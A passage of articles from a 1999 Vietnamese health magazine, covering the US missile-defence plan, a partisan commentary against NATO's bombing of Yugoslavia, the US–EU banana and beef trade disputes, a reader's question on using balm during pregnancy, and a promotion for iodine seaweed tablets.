Hiện nay, người ta lại đưa ra dự án ở rộng hệ thống phòng chống tên lửa để “chống lại các cuộc tấn công hạn chế bằng tên lửa và đem ra thảo luận ở quốc hội Hoa Kỳ. Song, tuyên bố chính thức của chính phủ vẫn nhấn mạnh tầm quan trọng của hiệp ước Xô- Mỹ trước đây để bảo đảm thế ổn định chiến lược”.
Bỗng nhiên, ngày 20.1.1999, bộ trưởng quốc phòng Cô-hen công bố dự án hệ thống phòng chống tên lửa Mỹ được chi 6,6 tỷ USD cho kế hoạch 5 năm để đến năm 2005 có thể triển khai xong hệ thống này, nghĩa là Mỹ có cả thanh kiếm lẫn lá chắn. Lập luận cho tính khả thi của dự án này là:
a. trình độ kỹ thuật cho phép
b. nguy cơ của những cuộc tấn công hạt nhân đối với nước Mỹ ngày càng gia tăng.
Hãy xem xét 2 luận cứ ấy của nước Mỹ có cơ sở hay không?
Hoàng Vũ – Sức khỏe & Đời sống/ Bộ Y tế – Hà Nội – số 18(831) – Năm 1999

Lối thoát cho cuộc khủng hoảng Cô-Xô-Vô:

Chấm dứt tiến công quân sự, ngồi vào bàn đàm phán

Trong những tháng Mỹ và các nước thuộc tổ chức hợp tác liên minh quân sự Bắc Đại Tây Dương (NATO) tiến công ồ ạt và dữ dội Nam Tư, một nước thành viên liên hiệp quốc, có đầy đủ chủ quyền, hoàn toàn không đe dọa bất cứ nước thành viên NATO nào lại trùng hợp với kỷ niệm 50 thành lập NATO.
Một tháng tấn công quân sự bằng các máy bay chiến đấu siêu hiện đại sử dụng nhiều loại đạn, trong đó có cả đạn có chất phóng xạ, NATO do Mỹ cầm đầu đã thực hiện hơn 6000 phi vụ. Trong đó có khoảng 2000 phi vụ ném hơn 5000 tấn bom và phóng hơn 1500 quả tên lửa phá hủy hàng trăm công trình công cộng trong đó có trường học, bệnh viện, nhà trẻ, nhà ở, đường sá, cầu trục giao thông, các cơ quan thông tin đại chúng. Máy bay của Mỹ và NATO đã bắn vào những đoàn tàu đang trở người tị nạn rời khỏi Cô-xô-vô! Chỉ trong một tháng, hơn 1000 người đã chết và hơn 4000 người bị thương, gần 700 nghìn người phải đi lánh nạn. Chưa kể đến những thảm họa môi trường do các nhà máy vũ khí và hóa chất của Nam Tư bị đánh phá gây ra. Trong khi đó, Mỹ và các nước thành viên NATO không ngớt lời tuyên truyền, rêu rao rằng họ tiến hành tấn công Nam Tư là để “ngăn chặn thảm họa nhân đạo”, để “bảo vệ người gốc An-ba-ni ở Cô-xô-vô”. Bản liệt kê chưa đầy đủ những “thành tích” của NATO trên đây có thể chỉ rõ ai là người gây ra “thảm họa nhân đạo”
Ngày 23-4, một ngày sau khi ném bom phá hủy hoàn toàn tư dinh tổng thống Nam Tư X. Mi-lô-xê-vich, các máy bay NATO đã tiến công tàn bạo trung tâm truyền hình quốc gia Xéc-bi-a tại Bê-ô-grát, làm 10 nhà báo thiệt mạng và hàng chục người khác bị thương. Cùng ngày hôm đó, tại Oa-sinh-tơn, hội nghị cấp cao của NATO và các nước đối tác kỷ niệm 50 năm thành lập NATO đã diễn ra dưới cái bóng đen của cuộc chiến Cô-xô-vô. 50 năm sau ngày thành lập, trên thế giới không còn tổ chức hiệp ước Vac-sa-va, một đối trọng của NATO thời kì chiến tranh lạnh, lẽ ra, NATO không còn lí do để tồn tại. NATO nhanh chóng được Mỹ lựa chọn như một công cụ thích hợp tiếp sau chiến tranh lạnh của mình để thực hiện ý đồ làm bá chủ thế giới. Với chủ trương đổi mới và mở rộng NATO, Mỹ muốn đưa khối quân sự này tiến gần đến biên giới nước Nga, xóa bỏ những ảnh hường còn lại của Nga ở Châu  u, thu nhỏ không gian chiến lược của Nga và tạo cớ mới để NATO tiếp tục tồn tại. Bộ trưởng bộ giao Mỹ, M. On-brai mới đây nói rằng trong thế kỷ tới, hành động của NATO sẽ không có sự hạn chế về khu vực. Nhiều nhà bình luận nhận xét rằng cuộc tiến công Nam Tư của NATO là thử nghiệm học thuyết quân sự mới của Mỹ.
Những nỗ lực ngoại giao đã và đang được tiên hành nhằm tìm giải pháp chính trị cho cuộc xung đột của Cô-xô-vô. Ngày 22-4, sau khi gặp đặc phái viên của tổng thống Nga V. Tréc-nô-mư-rơ-đin, tổng thống Nam Tư X. Mi-lô-xê-vich đã chấp thuận để một lực lượng quốc tế của liên hiệp quốc, với sự tham gia của Nga vào Cô-xô-vô. Tuy nhiên, tổng thống Mỹ B. Clin-tơn, thủ tướng Anh T. Ble và tổng Pháp G. Si-rắc coi sự chấp nhận của ông X. Mi-lô-xê-vich là “chưa đủ”, đồng thời lầu năm góc tuyên bố rằng Mỹ và NATO quyết định mở rộng cuộc tiến công Nam Tư, thậm chí đe dọa cuộc chiến tranh tổng lực trên bộ các nước cộng hòa nhỏ bé với chỉ hơn 10 triệu dân này. Loài người tiến bộ đòi Mỹ và các nước NATO chấm dứt ngay cuộc tiến công Nam Tư.
Hương Giang – Sức khỏe & Đời sống/ Bộ Y tế – Hà Nội – số 18(831) – Năm 1999

Kẻ tám lạng, người nửa cân

Ngày 21-4, các quan chức liên hiệp Châu  u (EU) cho biết EU đang xét khả năng cấm nhập khẩu hoàn toàn các loại thịt bò của Mỹ từ ngày 15-6 tới. Người phát ngôn EU, G. Ki-ê-ly, khẳng định lệnh cấm trên nhằm không cho thịt bò sử dụng hoóc-môn tăng trưởng vào thị trường EU. Quyết định của EU, trả đũa việc EU thua kiện vụ buôn bán chuối với Mỹ mới đây, càng làm tăng sự căng thẳng trong quan hệ thương mại vốn gay gắt giữa Mỹ và EU sau nhiều năm tranh chấp về các vấn đề buôn bán chuối, sắt thép, năng lượng, các mặt hàng nông sản khác.
Tranh chấp Mỹ – EU quanh chuyện buôn bán chuối bắt đầu từ năm 93. Năm 1997, EU thua kiện nhưng không chịu nhượng bộ. Việc EU ban hành quy chế mới về nhập khẩu chuối, trong đó ưu tiên nhập mặt hàng này từ các nước Châu  u, chủ yếu từ 15 nước thành viên EU, khiến Oa-sin-tơn nổi đóa. Tại vòng thương lượng tháng 1 năm nay, ở Giơ-ne-vơ (Thụy Sĩ), thảo luận kế hoạch hào giải do cơ quan giải quyết tranh chấp (DSB) của WTO đưa ra, hai bên không đạt thỏa thuận nào. Mỹ yêu cầu DSB cho áp dụng thuế trừng phạt hàng nhập khẩu từ EU 520 triệu USD/ năm, bắt đầu từ ngày 1-2, EU phê phán Mỹ phớt lờ WTO. Đầu tháng 3, lấy cớ quy chế mới của EU có hiệu lực từ ngày 1-1 năm nay “hoàn toàn không có gì mới”, “không tốt hơn trước”, Mỹ gia hạn từ ngày 3-3 các nhà nhập khẩu hàng hóa Châu  u, chủ yếu EU, phải chịu thêm thuế 100%. Các nhà lập pháp Mỹ dòi phải tìm cách bù đắp thiếu hụt buôn bán năm 1998 lên tới 169 tỷ USD và theo họ là do các nước khác. Thiếu hụt buôn bán tháng 2 vừa qua của Mỹ là 19,44 tỷ USD, cao hơn tháng trước thiếu hụt 16 tỷ USD, càng làm Mỹ thêm cứng rắn. Các quan chức EU lo ngại thái độ đó của Mỹ sẽ tác động xấu đến buôn bán của liên hiệp (Xcốt-len có thể mất 2000 việc làm).
Sau nhiều cuộc tranh cãi, phân giải, ngày 19-4 BSD thông qua quyết định chấp nhận đòi hỏi của Oa-sinh-tơn đánh thuế 100% đối với 9 mặt hàng nhập khẩu từ EU, trị giá 191,4 triệu USD/ năm.
Tuy nhiên được đằng chân lân đằng đầu, Mỹ muốn lệnh trừng phạt DSB vừa chấp nhận phải có hiệu lực từ ngày 3-3. EU nêu rõ lệnh này chỉ có hiệu lực trong thời điểm hiện tại. 12 trong số 15 nước thành viên EU không nhất trí với phán quyết của DSB và kêu gọi ủy ban Châu  u (EC) tiến hành tư vấn với nghị viện Châu  u về vấn đề trên. Điều này có nghĩa là quyết định trừng phạt chỉ có hiệu lực từ sau phiên họp mùa hè, cũng có nghĩa là quyết định của DSB chỉ khép lại, về danh chính ngôn thuận, cuộc tranh cãi về chuối, nhưng không có giải pháp nào cho việc thực hiện trên thực tế.
Chưa xong chuyện buôn bán chuối, Mỹ và EU lại găng nhau chuyện thịt bò. Từ năm 1998, 15 nước EU chỉ nhập khẩu thịt bò có chứng nhận không sử dụng hoóc-môn tăng trưởng, mặc dù việc này bị WTO coi là vô lý, không hợp pháp. Ngành công nghiệp thịt bò của Mỹ tố cáo EU gây thiệt hại cho các nhà sản xuất và xuất khẩu thịt bò Mỹ 250 triệu USD/ năm. Ngày 20-4 vừa qua, Mỹ và Canada cho biết sẽ kiện EU nếu khối này không có giải pháp chấp dứt cuộc tranh cãi về việc EU cấm nhập thịt bò có hooc-môn tăng trưởng. Nhà trắng dọa sẽ trừng phạt hàng trăm triệu USD nếu EU không bỏ lệnh này, theo phán quyết của WTO, từ ngày 13-5 tới.
Cuộc chiến thương mại giữa kẻ tám lạng người nửa cân còn tiếp tục.
Hà Phương- Sức khỏe & Đời sống/ Bộ Y tế – Hà Nội – số 18(831) – Năm 1999

Dầu cao với người mang thai

Tôi mang thai ba tháng, một lần ăn thức ăn lại thấy đầy bụng, nghe nói khi có bầu không được uống thuốc, chỉ lấy cao con hổ bôi vào rốn đắp chăn một lúc thì khỏi. Sau này cả nhà mắng tôi: “liều mạng bôi dầu nóng bụng thai sổ ra thì sao”. Vậy tác hại của cao đối với người mang bầu ra sao. Nếu bị đau bụng như trường hợp của tôi phải làm thế nào?
Phụ nữ có thai cần tránh dùng một số thuốc. Trong ba tháng đầu một số thuốc có thể gây ra quái thai (như quinin pyrimethamin, trimethoprim). Những tháng sau thuốc cũng gây nên một số tác hại khác (như chất giảm đau gây nghiện sẽ làm suy hô hấp trẻ mới đẻ, streptomycin làm cho trẻ sinh rabị điếc). Danh mục thuốc gây quái thai, hại thai đã có khá nhiều, song cũng chưa bao hàm hết (vì người ta chưa đủ kinh nghiệm). Do thế, lúc có thai nên tránh hết sức việc dùng thuốc. Nếu một lý do nào đó cần phải dùng thì phải cân nhắc kỹ lưỡng cái lợi, cái hại (của bà mẹ và thai nhi) thường dùng liều vừa đủ (để tránh tai biến cho liều cao); đồng thời cần tránh dùng loại thuốc quá mới (vì ta chưa nắm chắc độc tính).
Bạn bị đầy bụng có thể do ăn uống thì thay đổi chế độ ăn, đồng thời vẫn có thể dùng một số thuốc chống đầy hơi như carbophos (UPSA – Pháp), thuốc làm dễ tiêu panthicon – F (Samchundung – Hàn Quốc) gồm chủ yếu là men tiêu hóa, chứ không phải kiêng tuyệt đối thuốc.
Dùng cao hổ bôi lên bụng không có lợi vì : nếu cao hổ cốt thật thì phải hòa tan trong cao rượu mới bôi được. Cũng có loại cao xoa có hình con hổ nhưng chỉ gồm các loại tinh dầu. Bôi rượu hay bôi tinh dầu nhiều lần, có hại cho thai.
Nói tóm lại trong thời kỳ có thai không nên dùng thuốc, nếu dùng phải được bác sĩ thăm khám và hướng dẫn chu đáo.
Sắp tới trên thị trường sẽ xuất hiện một số sản phẩm mới: viên bao Ido. Đây là sản phẩm được điều chế từ cao khô rong mơ (hay còn gọi là hải tảo). Viên bao Ido đã được thử nghiệm rộng trên lâm sàng, điều trị bướu cổ đơn thuần và các rối loạn khác do thiếu iốt. Viên bao Ido đã được bộ y tế công nhận là sử dụng an toàn, hiệu quả. Hoạt chất iốt ở dạng hữu cơ dễ hấp thụ và chuyển hóa trong cơ thể. Đặc biệt iốt hữu cơ chứa trong rong mơ không độc đối với cơ thể như iốt vô cơ và không gây tình trạng tích lũy iốt.
Sản phẩm Ido được chống chỉ định với các bệnh nhân suy tim, loạn nhịp tim, nhồi máu cơ tim, suy gan, hội chứng thận hư, bệnh nhân đang dùng thuốc salicylate dicumarol và bệnh bướu giáp do thừa iốt.
Viên bao Ido sẽ giữ vị trí xứng đáng trong chữa trị bướu cổ đơn thuần và các bệnh rối loạn khác do thiếu iốt trong nhân dân.
Hà Thủy Phước – Sức khỏe & Đời sống/ Bộ Y tế – Hà Nội – số 18(831) – Năm 1999